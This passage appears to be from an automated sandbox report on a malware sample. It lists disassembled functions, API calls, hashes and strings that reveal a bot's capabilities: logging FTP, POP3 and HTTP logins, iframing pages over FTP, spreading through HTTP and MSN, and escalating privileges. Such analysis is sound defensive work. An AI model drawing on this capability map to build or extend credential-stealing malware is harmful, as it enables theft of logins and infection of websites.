                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040A5B3
                                                                  • GetLastError.KERNEL32 ref: 0040A5B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: StringToken$AddressAdjustAnsiErrorLastLookupOpenPrivilegePrivilegesProcedureProcessUnicodeValue
                                                                  • String ID: NtShutdownSystem$SeShutdownPrivilege$ntdll.dll
                                                                  • API String ID: 4135695518-1699316426
                                                                  • Opcode ID: c995f3c1d0a724f36528810c0480acc16cd25410b87a2cccc31b0e10fa1897df
                                                                  • Instruction ID: 41268f7d111cdba9b222163e3203631acf71579276c4fa84ae79774109ae6c2c
                                                                  • Opcode Fuzzy Hash: c995f3c1d0a724f36528810c0480acc16cd25410b87a2cccc31b0e10fa1897df
                                                                  • Instruction Fuzzy Hash: EFF08675E403047BD710EBE59D0AFEF7BAC9B08705F104026B604F61D1DAF46A448BA9
                                                                  Function 0036A550 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00363920: RtlAnsiStringToUnicodeString.NTDLL(?,?,00000000), ref: 00363962
                                                                    • Part of subcall function 00363750: LdrGetProcedureAddress.NTDLL(?,00000000,00000000,?), ref: 0036376B
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,ntdll.dll,NtShutdownSystem), ref: 0036A57A
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0036A58F
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0036A5B3
                                                                  • GetLastError.KERNEL32 ref: 0036A5B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: StringToken$AddressAdjustAnsiErrorLastLookupOpenPrivilegePrivilegesProcedureProcessUnicodeValue
                                                                  • String ID: NtShutdownSystem$SeShutdownPrivilege$ntdll.dll
                                                                  • API String ID: 4135695518-1699316426
                                                                  • Opcode ID: 350b54479aa84f554cd6323ba044ac2d77b64063104259ca8f6593464f6c12d5
                                                                  • Instruction ID: 773b607be1bb5ac7de4fee39e4e002afb8d01efc9d35bd2824981dd6eb46e3da
                                                                  • Opcode Fuzzy Hash: 350b54479aa84f554cd6323ba044ac2d77b64063104259ca8f6593464f6c12d5
                                                                  • Instruction Fuzzy Hash: D2F0A476A403047BE721EBE89C0BFEF77AC9B04B00F108004F609FA1C5DEB06A448BA1
                                                                  Function 00364C20 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00364E7E,SeDebugPrivilege,00000001,00000000,ntdll.dll,NtGetNextProcess), ref: 00364C32
                                                                  • GetLastError.KERNEL32 ref: 00364C3C
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00364C52
                                                                  • GetLastError.KERNEL32 ref: 00364C5C
                                                                  • CloseHandle.KERNEL32(?), ref: 00364C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CloseHandleLookupOpenPrivilegeProcessTokenValue
                                                                  • String ID:
                                                                  • API String ID: 1673749002-0
                                                                  • Opcode ID: bab72ac6c93dfc6c1d4ce536cb2640832666144c0450ba6632b5312c280833c5
                                                                  • Instruction ID: 86aa566cee1c97aa597bef922b533b604b9e90c8c93a1de2fa20620043c5b14d
                                                                  • Opcode Fuzzy Hash: bab72ac6c93dfc6c1d4ce536cb2640832666144c0450ba6632b5312c280833c5
                                                                  • Instruction Fuzzy Hash: 3E118676A10208ABDB21DFE8DD0DFAEB7BCEB49701F404549FE0DD7240EA71994487A1
                                                                  Function 003642E0 Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8b93125eba8910506b40e9ba5b4385cef48a0e054bcb804f68244df297e9a45
                                                                  • Instruction ID: 942ce6274c200554a49d74525d88e97118f562e65eab34f5e31120a6708bfbdc
                                                                  • Opcode Fuzzy Hash: c8b93125eba8910506b40e9ba5b4385cef48a0e054bcb804f68244df297e9a45
                                                                  • Instruction Fuzzy Hash: EB31A475B003046BD7329F6AEC41F6BB3ADEB80711F258559FD09D7384EA71EC1086A0
                                                                  Function 003656E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtQuerySystemInformation.NTDLL(00000005,?,?,?), ref: 00365741
                                                                  • NtQuerySystemInformation.NTDLL(00000005,?,?,?), ref: 0036578B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InformationQuerySystem
                                                                  • String ID: (m7
                                                                  • API String ID: 3562636166-2716958383
                                                                  • Opcode ID: c86ca335198586971830259d0150735b7467204357c4a947286d54eb30c6aacb
                                                                  • Instruction ID: 6a7b06e9c0514afae4573d3a2dba231199cec1e3188b114992121cb2529e51ac
                                                                  • Opcode Fuzzy Hash: c86ca335198586971830259d0150735b7467204357c4a947286d54eb30c6aacb
                                                                  • Instruction Fuzzy Hash: C0416E75A00619ABDB21CFA4DC81FBEB3B8EB88704F158568E905E7244E774ED50CBA0
                                                                  Function 00408C90 Relevance: 4.8, APIs: 3, Instructions: 282COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: c0089952ace360ebcc3e34eb2580965971ac3f93c53b4d4a5c5986bf46cea3ca
                                                                  • Instruction ID: febdc5ac0e38d1c8f41d274fc77bf47f9808ab6730b1dfa3b6492b89c998bcbc
                                                                  • Opcode Fuzzy Hash: c0089952ace360ebcc3e34eb2580965971ac3f93c53b4d4a5c5986bf46cea3ca
                                                                  • Instruction Fuzzy Hash: A9A17FB19006059FCB20DF65CA8086FB7B9FF94314B10853FE586E7780DB38E9418B95
                                                                  Function 00368C90 Relevance: 4.8, APIs: 3, Instructions: 282COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: c0089952ace360ebcc3e34eb2580965971ac3f93c53b4d4a5c5986bf46cea3ca
                                                                  • Instruction ID: 3b1c0084b12f256ce239e1f2dbe37b5a54488aa8cc27bd0b4d39ea97744b4ec9
                                                                  • Opcode Fuzzy Hash: c0089952ace360ebcc3e34eb2580965971ac3f93c53b4d4a5c5986bf46cea3ca
                                                                  • Instruction Fuzzy Hash: D8A18EB19006059FCB22DFA5D9C086FB7F9FF98314B11CA6EE5469B608DB31E901CB61
                                                                  Function 0036F9E0 Relevance: 4.6, APIs: 3, Instructions: 65stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036F9FF
                                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 0036FA22
                                                                  • lstrcatA.KERNEL32(00000000,00373040), ref: 0036FA5C
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F459
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F472
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F48B
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F4A4
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F4BD
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F4D6
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F4F2
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F50B
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F526
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F541
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F55C
                                                                    • Part of subcall function 0036F430: sprintf.MSVCRT ref: 0036F571
                                                                    • Part of subcall function 0036F430: sprintf.MSVCRT ref: 0036F586
                                                                    • Part of subcall function 0036F430: wsprintfW.USER32 ref: 0036F5A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset$sprintf$DriveLogicalStringslstrcatwsprintf
                                                                  • String ID:
                                                                  • API String ID: 563256260-0
                                                                  • Opcode ID: 8ea4098c29b3b19f6c80006f22f617f2e99f747f93eb6427672a10c4c5a6d508
                                                                  • Instruction ID: 6bda8b0900d93b91daff48e03b3481886123affa712e9759098cd1d3ea3897d8
                                                                  • Opcode Fuzzy Hash: 8ea4098c29b3b19f6c80006f22f617f2e99f747f93eb6427672a10c4c5a6d508
                                                                  • Instruction Fuzzy Hash: F3115EB5901349AEDB22DBB4EC41FEAB7789F14304F0480B9E94CA7146E5B05B0DCB61
                                                                  Function 00408B30 Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00408B6E
                                                                  • EncryptMessage.SECUR32(?,00000000,?,00000000,?,?,?), ref: 00408C29
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: EncryptMessagememset
                                                                  • String ID:
                                                                  • API String ID: 3924230039-0
                                                                  • Opcode ID: e2ab3e0427d67a117949027b41559f788fb6a7f02857e0614c7bc85d79e661e5
                                                                  • Instruction ID: 187c4bea0345dcc81a1e91117d9d58187b68109648b59adc59adcf4ae98d03d5
                                                                  • Opcode Fuzzy Hash: e2ab3e0427d67a117949027b41559f788fb6a7f02857e0614c7bc85d79e661e5
                                                                  • Instruction Fuzzy Hash: 5D410BB1D01208EFCB50CFA9D981ADEBBF5EF88314F14852EE849E7341D774AA458B94
                                                                  Function 00368B30 Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00368B6E
                                                                  • EncryptMessage.SECUR32(?,00000000,?,00000000,?,?,?), ref: 00368C29
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: EncryptMessagememset
                                                                  • String ID:
                                                                  • API String ID: 3924230039-0
                                                                  • Opcode ID: e2ab3e0427d67a117949027b41559f788fb6a7f02857e0614c7bc85d79e661e5
                                                                  • Instruction ID: b61f3d4e1aedb6f2827acecde45dbe0953f7d338cc181ab8d833437bb09d93ae
                                                                  • Opcode Fuzzy Hash: e2ab3e0427d67a117949027b41559f788fb6a7f02857e0614c7bc85d79e661e5
                                                                  • Instruction Fuzzy Hash: E8411EB1D01208EFCB11CFA9D981ADEBBF5FF88314F14852AE849E7204D770AA45CB90
                                                                  Function 00369E7B Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNEL32(00000000,?,00008000,?,00000000), ref: 00369E8D
                                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 00369EA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDeviceFileWrite
                                                                  • String ID:
                                                                  • API String ID: 564257829-0
                                                                  • Opcode ID: 8a8d713ac8bbe28bcd855ce0ac5e891d2b9d2a39c4c4b13159d5c3b48d242ba3
                                                                  • Instruction ID: e2080bde2903acd5c0182994c92314af4119ce9e7050c601c551be7b812557b5
                                                                  • Opcode Fuzzy Hash: 8a8d713ac8bbe28bcd855ce0ac5e891d2b9d2a39c4c4b13159d5c3b48d242ba3
                                                                  • Instruction Fuzzy Hash: EFE0C2F2210108BDF620C2949D81FFB371CD784711F100193FD09D0080D961AD4497B0
                                                                  Function 00363830 Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00362D43,?,00000100,?,(m7,?,?,00365730,?,00008000,?,00000000), ref: 0036384F
                                                                  • HeapReAlloc.KERNEL32(00000000,?,00362D43,?,00000100,?,(m7,?,?,00365730,?,00008000,?,00000000,00000000,?), ref: 00363856
                                                                    • Part of subcall function 00363810: GetProcessHeap.KERNEL32(00000000,00000000,?,00364046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00363819
                                                                    • Part of subcall function 00363810: HeapAlloc.KERNEL32(00000000,?,00364046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00363820
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: f8359e7331deb651205373da72dfd739c5a8e68fdb34e468dec3666a4957e540
                                                                  • Instruction ID: 2625e6aabad2cf0ab874c2cfe11ec0a241e65037edebf17b23120b3c1ad8e8b2
                                                                  • Opcode Fuzzy Hash: f8359e7331deb651205373da72dfd739c5a8e68fdb34e468dec3666a4957e540
                                                                  • Instruction Fuzzy Hash: F1D012B65002086BEB019BA4EC49EAA375C9B04714F448014FA0D8B501D631E9508761
                                                                  Function 00361AD0 Relevance: 1.6, APIs: 1, Instructions: 53timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00361AE9
                                                                    • Part of subcall function 00361A10: CreateFileW.KERNEL32(?,00000100,00000001,00000000,00000003,?,00000000), ref: 00361A36
                                                                    • Part of subcall function 00361A10: SetFileTime.KERNEL32(00000000,?,?,?), ref: 00361A50
                                                                    • Part of subcall function 00361A10: CloseHandle.KERNEL32(00000000), ref: 00361A59
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileTime$CloseCreateHandleSystem
                                                                  • String ID:
                                                                  • API String ID: 489727163-0
                                                                  • Opcode ID: b2e14b774be4cd6c293cc0c603382b1b9a3438024ae1840398883401c2ed36ca
                                                                  • Instruction ID: 57f4263df51c766d937934ddecf4d5785fa10fb2a9ff2bbebd84f47e4d3221d8
                                                                  • Opcode Fuzzy Hash: b2e14b774be4cd6c293cc0c603382b1b9a3438024ae1840398883401c2ed36ca
                                                                  • Instruction Fuzzy Hash: 0911DEB6D10228BBCB05EFD4DC81EEEB77CAB58B00F04854AB615E7145E670A704CBA5
                                                                  Function 00402D60 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74ab7da85d1484886710da23cc53855dd25be7a8e112030da8bc2f05dc99f62e
                                                                  • Instruction ID: 219b0fc98e8f073de552917feaf8e62aac511575ba6e78677fee7b87815c9be5
                                                                  • Opcode Fuzzy Hash: 74ab7da85d1484886710da23cc53855dd25be7a8e112030da8bc2f05dc99f62e
                                                                  • Instruction Fuzzy Hash: BA014F322B5D0E49C75E451C1A2CABB12020F56B597D4463A4AC2F07D4EDFEEC43D08D
                                                                  Function 00362D60 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 82c71bca018e55767288fbc09d243066027f6e76293dfe47211a1aefeaf2a69d
                                                                  • Instruction ID: a524b2347caae6757859291ebfb8d3e984afe2170a5e06bc67021da95be79e99
                                                                  • Opcode Fuzzy Hash: 82c71bca018e55767288fbc09d243066027f6e76293dfe47211a1aefeaf2a69d
                                                                  • Instruction Fuzzy Hash: 500112722B5D0E48C75F451C4814ABB12094F56B96B97C6389EE2D47ECDDDAEC43D084
                                                                  Function 0040D7A0 Relevance: 154.5, APIs: 54, Strings: 34, Instructions: 473memorystringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 0040D7C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 0040D7D2
                                                                  • memset.MSVCRT ref: 0040D7EE
                                                                  • HeapFree.KERNEL32(?,?,00000000), ref: 0040D80B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040D819
                                                                  • GetLastError.KERNEL32 ref: 0040D82F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040D83C
                                                                  • GetLastError.KERNEL32 ref: 0040D852
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040D85B
                                                                  • ReadFile.KERNEL32(?,00000000,00000800,00000000,00000000), ref: 0040D87A
                                                                  • atoi.MSVCRT(00000000), ref: 0040D8D3
                                                                  • strchr.MSVCRT ref: 0040D8E8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040D900
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 0040D924
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 0040D930
                                                                  • strchr.MSVCRT ref: 0040D93F
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D952
                                                                  • lstrcpynA.KERNEL32(00000000,00000001,00000000), ref: 0040D95E
                                                                  • lstrcpynA.KERNEL32(?,00000000,00000001), ref: 0040D96D
                                                                  • lstrcmpA.KERNEL32(?,ftplog), ref: 0040D97F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFree$ErrorLastlstrcpynlstrlenstrchr$FileReadatoilstrcmpmemset
                                                                  • String ID: 0WA$30e44aa1$4WA$8WA$<WA$@WA$FTP -> $POP3 -> $[DNS]: Blocked DNS "%s"$[FTP Infect]: %s was iframed$[FTP Login]: %s$[HTTP Login]: %s$[HTTP Traffic]: %s$[HTTP]: %s$[MSN]: %s$[PDef+]: %s$[POP3 Login]: %s$[Ruskill]: Detected DNS: "%s"$[Ruskill]: Detected File: "%s"$[Ruskill]: Detected Reg: "%s"$blk$block$disable$dns$ftpinfect$ftplog$httplogin$httpspread$httptraff$msn$poplog$rdns$rreg$ruskill
                                                                  • API String ID: 1531277263-343948886
                                                                  • Opcode ID: 226946bfaaa6e499b063feb038c8fac31a3ab4f314e31c634eed55588fe6e7b0
                                                                  • Instruction ID: 93a879a63f9d5e1309c0a058911fb680e789185c1f282c53cedf1341369c8508
                                                                  • Opcode Fuzzy Hash: 226946bfaaa6e499b063feb038c8fac31a3ab4f314e31c634eed55588fe6e7b0
                                                                  • Instruction Fuzzy Hash: B2E12771A40604BBE71067A59C46FFF762CEF89705F21803AFA15B22D1DBB89D04C6AD
                                                                  Function 0036D7A0 Relevance: 154.5, APIs: 54, Strings: 34, Instructions: 473memorystringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 0036D7C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 0036D7D2
                                                                  • memset.MSVCRT ref: 0036D7EE
                                                                  • HeapFree.KERNEL32(?,?,00000000), ref: 0036D80B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036D819
                                                                  • GetLastError.KERNEL32 ref: 0036D82F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036D83C
                                                                  • GetLastError.KERNEL32 ref: 0036D852
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036D85B
                                                                  • ReadFile.KERNEL32(?,00000000,00000800,00000000,00000000), ref: 0036D87A
                                                                  • atoi.MSVCRT(00000000), ref: 0036D8D3
                                                                  • strchr.MSVCRT ref: 0036D8E8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036D900
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 0036D924
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 0036D930
                                                                  • strchr.MSVCRT ref: 0036D93F
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036D952
                                                                  • lstrcpynA.KERNEL32(00000000,00000001,00000000), ref: 0036D95E
                                                                  • lstrcpynA.KERNEL32(?,00000000,00000001), ref: 0036D96D
                                                                  • lstrcmpA.KERNEL32(?,ftplog), ref: 0036D97F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFree$ErrorLastlstrcpynlstrlenstrchr$FileReadatoilstrcmpmemset
                                                                  • String ID: 0W7$30e44aa1$4W7$8W7$<W7$@W7$FTP -> $POP3 -> $[DNS]: Blocked DNS "%s"$[FTP Infect]: %s was iframed$[FTP Login]: %s$[HTTP Login]: %s$[HTTP Traffic]: %s$[HTTP]: %s$[MSN]: %s$[PDef+]: %s$[POP3 Login]: %s$[Ruskill]: Detected DNS: "%s"$[Ruskill]: Detected File: "%s"$[Ruskill]: Detected Reg: "%s"$blk$block$disable$dns$ftpinfect$ftplog$httplogin$httpspread$httptraff$msn$poplog$rdns$rreg$ruskill
                                                                  • API String ID: 1531277263-1300064085
                                                                  • Opcode ID: db6ba5268b1a73ff2f50484ae9ddc0366b6b19cda26393d09d526b6fd9997f64
                                                                  • Instruction ID: 68c2467bdba1e249cd07bffd2784bfbfdd79010f791feb64c3beef2f6a80a50e
                                                                  • Opcode Fuzzy Hash: db6ba5268b1a73ff2f50484ae9ddc0366b6b19cda26393d09d526b6fd9997f64
                                                                  • Instruction Fuzzy Hash: 50E13876B40605BBE7335BA89C4AFBF776CEF86700F51C004F909A6295DBA49C40DBA1
                                                                  Function 00410430 Relevance: 112.3, APIs: 51, Strings: 13, Instructions: 334stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,756F59EB), ref: 00410446
                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0041044C
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410453
                                                                  • memset.MSVCRT ref: 0041048B
                                                                  • GetProcessHeap.KERNEL32 ref: 00410493
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 004104A9
                                                                  • sscanf.MSVCRT ref: 004104C5
                                                                  • strstr.MSVCRT ref: 004104DC
                                                                  • lstrlenA.KERNEL32(00402780), ref: 004104F0
                                                                  • lstrlenA.KERNEL32(?), ref: 004104FA
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 00410505
                                                                  • strtok.MSVCRT ref: 0041051B
                                                                  • lstrcpyA.KERNEL32(00000000,00411335), ref: 00410534
                                                                  • _memicmp.MSVCRT ref: 00410557
                                                                  • lstrlenA.KERNEL32(00402780), ref: 00410567
                                                                  • _snprintf.MSVCRT ref: 0041057B
                                                                  • _memicmp.MSVCRT ref: 00410596
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004105A7
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004105F1
                                                                  • lstrcatA.KERNEL32(00000000,00412B84), ref: 004105F9
                                                                  • strtok.MSVCRT ref: 00410602
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0041061C
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 00410624
                                                                  • lstrcatA.KERNEL32(00000000,00402780), ref: 0041062B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041062E
                                                                  • _snprintf.MSVCRT ref: 00410646
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041064F
                                                                  • lstrlenA.KERNEL32(?), ref: 0041065A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000040), ref: 00410667
                                                                  • _snprintf.MSVCRT ref: 00410688
                                                                  • sscanf.MSVCRT ref: 004106A0
                                                                  • strstr.MSVCRT ref: 004106B7
                                                                  • strstr.MSVCRT ref: 004106D2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 004106E6
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 004106F3
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 004106FF
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410714
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 00410721
                                                                  • lstrcpynA.KERNEL32(?,-00000002,?), ref: 0041072C
                                                                  • lstrlenA.KERNEL32(?), ref: 00410736
                                                                  • lstrlenA.KERNEL32(00402780), ref: 0041073E
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 0041074B
                                                                  • lstrlenA.KERNEL32(?,?,00402780), ref: 00410761
                                                                  • lstrlenA.KERNEL32(00402780), ref: 0041076A
                                                                  • _snprintf.MSVCRT ref: 00410787
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0041079F
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 004107AC
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004107B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$Alloc$_snprintf$Freestrstr$Process_memicmplstrcpysscanfstrtok$lstrcpynmemset
                                                                  • String ID: $%s%s$Content-Length: $Content-Length: %d$From: $MSG %d %1s$MSG %d %s %d%s%s$Reliability: $SDG $SDG $SDG %d$SDG %d %d$X-MMS-IM-Format:
                                                                  • API String ID: 375969099-2909086048
                                                                  • Opcode ID: 37cc3c8f1d7efab5335082757353a03a82e25d8d8234addcd3faba9dbf623912
